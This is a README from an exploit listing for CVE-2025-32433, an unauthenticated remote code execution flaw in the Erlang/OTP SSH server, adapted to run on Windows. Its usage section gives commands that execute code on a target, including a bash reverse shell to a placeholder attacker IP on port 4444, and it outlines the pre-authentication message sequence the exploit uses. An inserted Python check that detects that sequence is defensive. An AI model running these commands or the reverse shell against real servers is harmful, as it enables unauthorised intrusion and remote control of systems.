## https://sploitus.com/exploit?id=FB0B056A-9CB0-554E-AAF8-7026C77787A0
# CVE-2025-32433 Exploit (Windows Compatible)
Erlang/OTP SSH Unauthenticated Remote Code Execution
## Description
This repository contains an exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in the Erlang/OTP SSH server.
**Key Features:**
- ✅ Pre-authentication RCE exploit
- ✅ Fixed for Windows GBK encoding compatibility
- ✅ Works on Erlang/OTP versions ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19
## Vulnerability Details
**CVE ID:** CVE-2025-32433
**Severity:** Critical
**Impact:** Unauthenticated Remote Code Execution
The vulnerability allows attackers to execute arbitrary system commands on Erlang/OTP SSH servers without authentication by sending specially crafted SSH protocol messages.
## Affected Versions
```
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)
```
## Usage
```bash
# Basic command execution
python exploit.py -t -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
```
## Arguments
```
-t, --target Target IP address (default: 127.0.0.1)
-p, --port Target port (default: 2222)
-c, --command System command to execute
-e, --erlang Raw Erlang code to execute
```
## Windows Encoding Fix
This version fixes the encoding issue present in the original exploit:
**Problem:** The original exploit used the Unicode checkmark character (✓, U+2713), which causes GBK encoding errors on Windows:
```
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
```
**Solution:** Replaced the Unicode character with the standard ASCII `+` character for cross-platform compatibility.
## Technical Details
The exploit works by:
1. Establishing SSH connection and banner exchange
2. Sending SSH_MSG_KEXINIT packet
3. Opening SSH channel with SSH_MSG_CHANNEL_OPEN
4. Sending SSH_MSG_CHANNEL_REQUEST with malicious exec command **before authentication**
5. Executing arbitrary Erlang code via `os:cmd()`
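A defender-side check for the message ordering listed above, added here as an example and not part of this repository's code: it parses the cleartext client-to-server bytes of an SSH session and reports any connection-protocol message (RFC 4254 numbers 80-127) that arrives before `SSH_MSG_NEWKEYS`. It assumes the stream is already reassembled and that the messages are sent unencrypted, as the step list implies; the function names and both sample streams are constructed for illustration.

```python
import struct

SSH_MSG_NEWKEYS = 21              # RFC 4253: traffic is encrypted after this
CONNECTION_MSGS = range(80, 128)  # RFC 4254, e.g. 90 CHANNEL_OPEN, 98 CHANNEL_REQUEST
MAX_PACKET = 35000                # sanity bound on packet_length (RFC 4253, 6.1)

def cleartext_msg_numbers(buf):
    """Yield the message number of each unencrypted SSH binary packet in buf."""
    off = 0
    while off + 6 <= len(buf):
        plen, pad = struct.unpack_from(">IB", buf, off)
        payload_len = plen - pad - 1
        if plen > MAX_PACKET or payload_len < 1 or off + 4 + plen > len(buf):
            return                # truncated, or not a cleartext packet
        yield buf[off + 5]        # first payload byte is the message number
        off += 4 + plen

def preauth_connection_msgs(client_stream):
    """Connection-protocol message numbers a client sent before SSH_MSG_NEWKEYS."""
    _banner, _sep, rest = client_stream.partition(b"\n")  # skip identification line
    hits = []
    for msg in cleartext_msg_numbers(rest):
        if msg == SSH_MSG_NEWKEYS:
            break                 # key exchange completed normally
        if msg in CONNECTION_MSGS:
            hits.append(msg)
    return hits

def frame(payload, block=8):
    """Wrap a payload in the cleartext binary packet format (sample data only)."""
    pad = block - (5 + len(payload)) % block
    if pad < 4:
        pad += block
    return struct.pack(">IB", 1 + len(payload) + pad, pad) + payload + bytes(pad)

# Constructed samples: only the message number is meaningful, the rest is zero filler.
BANNER = b"SSH-2.0-sample_client\r\n"
FILLER = bytes(16)
BENIGN = (BANNER + frame(b"\x14" + FILLER) + frame(b"\x1e" + FILLER)
          + frame(b"\x15") + bytes(range(64, 96)))
SUSPECT = BANNER + frame(b"\x14" + FILLER) + frame(b"\x5a" + FILLER) + frame(b"\x62" + FILLER)

if __name__ == "__main__":
    for name, stream in (("benign", BENIGN), ("suspect", SUSPECT)):
        hits = preauth_connection_msgs(stream)
        print(f"{name}: {'ALERT ' + str(hits) if hits else 'ok'}")
```

The check only sees messages sent before encryption starts, so it complements upgrading to a patched OTP release and does not replace it.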
## References
- [GitHub Security Advisory](https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2)
- [Erlang/OTP Commit Fix](https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f)
- [RFC 4254 - SSH Connection Protocol](https://datatracker.ietf.org/doc/html/rfc4254)
- [ProDefense CVE-2025-32433](https://github.com/ProDefense/CVE-2025-32433)
## Patched Versions
- OTP 27.3.3
- OTP 26.2.5.11
- OTP 25.3.2.20
## Disclaimer
This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use responsibly and only on systems you have explicit permission to test.
## License
MIT License
## Author
Modified for Windows compatibility by chuzouX